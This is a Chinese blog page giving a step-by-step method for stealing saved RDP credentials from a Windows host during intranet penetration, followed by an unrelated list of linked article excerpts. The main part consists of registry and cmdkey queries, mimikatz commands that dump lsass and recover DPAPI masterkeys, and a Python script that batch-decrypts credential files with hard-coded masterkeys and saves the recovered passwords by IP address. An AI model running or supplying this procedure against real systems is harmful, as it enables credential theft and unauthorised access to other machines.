内网渗透-获取本地RDP密码

获取RDP 连接记录:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

cmdkey /list   查看保存凭据信息

本机脱取:

mimikatz # privilege::debug

mimikatz # dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\xx

离线脱取:

Procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* //查看凭据文件

Masterkey:

Processdump lsass.exe 进程    mimikatz 加载,获取masterkey

Sekurlsa::dump “lsass.dmp”

Sekurlsa::dpapi 获取masterkey

利用mimikatz   设置指定的masterkey,进行凭据文件解密

mimikatz 配合python  自动脱凭据  //最主要在凭据文件比较多的时候会用到。

import os

import re

for dd in os.listdir("C:\\Users\\admin\\Desktop\\mimkatz\\x64\\pinju\\"):

    key=['a8e9e1d02d5bdebd939faa1dd556f428ac9cfc19d68c8e758b2dd2364059c07a7cf8e8cd430d63a7deb628244a96cc52d7e51b03b7ccda5fec461c987c5b0828','8233e316134ace93c883bdf9b01dbc32d49d6d6e91bc1af0c7960247ff7c551fcd706711352d7a398d9e2fa9ab7e786c57fd81404201a1b990d26ee25686a625']

    for i in key:

        os.system(('mimikatz.exe "dpapi::cred /in:C:\\Users\\admin\\Desktop\\mimkatz\\x64\\pinju\\{} /masterkey:{}" exit >1n.txt').format(dd,i))

        f=open('1n.txt','r',encoding='UTF-8')

        res=f.read()

        if 'TERMSRV' in res:

            name=re.compile(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])')

            names=name.findall(res)

            print(names)

            d=open('./res/'+names[0]+'.txt','a+')

            d.write(res)

            d.close()

        f.close()
    
mimikatz 在用户sessions 下 
读取cmdkey 凭据
privilege::debug
vault::cred /patch
------------

												


											
RDP凭据离线脱取的更多相关文章
	

    
								
  1. POJ 2104 K-th Number ( 求取区间 K 大值 || 主席树 || 离线线段树)
		
    题意 : 给出一个含有 N 个数的序列,然后有 M 次问询,每次问询包含 ( L, R, K ) 要求你给出 L 到 R 这个区间的第 K 大是几 分析 : 求取区间 K 大值是个经典的问题,可以使用 ...
    
		
    2. 
						
  2. IM消息送达保证机制实现(二):保证离线消息的可靠投递
		
    1.前言 本文的上篇<IM消息送达保证机制实现(一):保证在线实时消息的可靠投递>中,我们讨论了在线实时消息的投递可以通过应用层的确认.发送方的超时重传.接收方的去重等手段来保证业务层面消 ...
    
		
    3. 
						
  3. Trickbot增加的远程应用程序凭证抓取功能
		
    来源 https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-cred ...
    
		
    4. 
						
  4. 如何使用RDP跳过网络隔离?
		
    简介 本文我将向大家演示,如何通过RDP跳转盒进入隔离/受保护的网络.下图是我为该场景制作的拓扑图: 简要说明: LAN是一种扁平的工作站和服务器网络. 一些服务器(包括RDP跳转盒)无法与Inter ...
    
		
    5. 
						
  5. Active Directory中获取域管理员权限的攻击方法
		
    Active Directory中获取域管理员权限的攻击方法         译:by  backlion 0x00 前言 攻击者可以通过多种方式在Active Directory中获得域管理员权限, ...
    
		
    6. 
						
  6. HW弹药库之红队作战手册
		
    红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击"  ...
    
		
    7. 
						
  7. 信息收集&Fuzz
		
    本文译自https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded- ...
    
		
    8. 
						
  8. GRE与Vxlan网络详解
		
    1. GRE 1.1 概念 GRE全称是Generic Routing Encapsulation,是一种协议封装的格式,具体格式内容见:https://tools.ietf.org/html/rfc ...
    
		
    9. 
						
  9. SQL注入原理及绕过安全狗
		
    1.什么是SQL注入攻击 SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 http://www.xxx.com/list. ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. P1352 没有上司的舞会&&树形DP入门
			
    https://www.luogu.com.cn/problem/P1352 题目描述 某大学有N个职员,编号为1~N.他们之间有从属关系,也就是说他们的关系就像一棵以校长为根的树,父结点就是子结点的 ...
    
			
    2. 
						
  2. G - Pairs Forming LCM LightOJ - 1236 (质因子分解)
			
    题解:这道题要从n的角度来考虑i和j. n可以表示为n=a1^p1*a2^p2*a3^p3.......n=lcm(i,j),那么质因子a1^p1,a1可以在i或者j中,并且p1=max(a1i,a1 ...
    
			
    3. 
						
  3. A 蚂蚁觅食
			
    A. 蚂蚁觅食(一) 单点时限: 1.0 sec 内存限制: 512 MB 一只饥饿的小蚂蚁外出觅食,幸运的小蚂蚁发现了好多食物,但是它只有一次搬食物的机会.可因为力气太小了,它不能搬走重量超过自己体 ...
    
			
    4. 
						
  4. windows编译动态链接库,dll+lib的形式
			
    之前一直在linux上做开发,没怎么关注过windows上如何编译动态链接库.不过一直存疑,为什么windows上的动态链接库是.dll配合.lib使用的,这个又是怎么生成的呢,通过一段时间的查资料和 ...
    
			
    5. 
						
  5. layui.laytpl 模板引擎用法
			
    目录 layui下载地址: 最终效果: 模板引擎文档 手册地址: 以下是代码思路: layui下载地址: https://www.layui.com/ 最终效果: 模板引擎文档 手册地址: https ...
    
			
    6. 
						
  6. selemiun 下拉菜单、复选框、弹框定位识别
			
    一.下拉菜单识别 对下拉框的操作,主要是通过Select 类里面的方法来实现的,所以需要new 一个Select 对象(org.openqa.selenium.support.ui.Select)来进 ...
    
			
    7. 
						
  7. C#集合类型——Hashtable、Dictionary之浅谈
			
    Hashtable表 数组.数组集合.List集合都是通过索引来访问里面成员.哈希表则是通过键来访问成员值.键不可为空,值可为空. 比如: Hashtable  hash=new  Hashtable ...
    
			
    8. 
						
  8. ubuntu16.04-交叉编译opencv3.4.6
			
    0.前言 在要移植opecv和SeetaFaceEngine-master到ARM板子上运行的所有步骤之前,有几点需要注意的: 查看板子运行的Kernel版本 交叉编译工具链的gcc版本,关键就是工具 ...
    
			
    9. 
						
  9. C#集合ArrayList、泛型集合List(3)
			
    数组的制约:局限性.有多少放多少,要想追加,就必须重新再定义一个数组,这就造成了资源的极大浪费而且性能消耗也比较大.因此此操作不太推荐.所以集合就来了. ,,,} 创建集合: ArrayList li ...
    
			
    10. 
						
  10. python入门学习之Python爬取最新笔趣阁小说
			
    Python爬取新笔趣阁小说,并保存到TXT文件中      我写的这篇文章,是利用Python爬取小说编写的程序,这是我学习Python爬虫当中自己独立写的第一个程序,中途也遇到了一些困难,但是最后 ...
    
			
    11.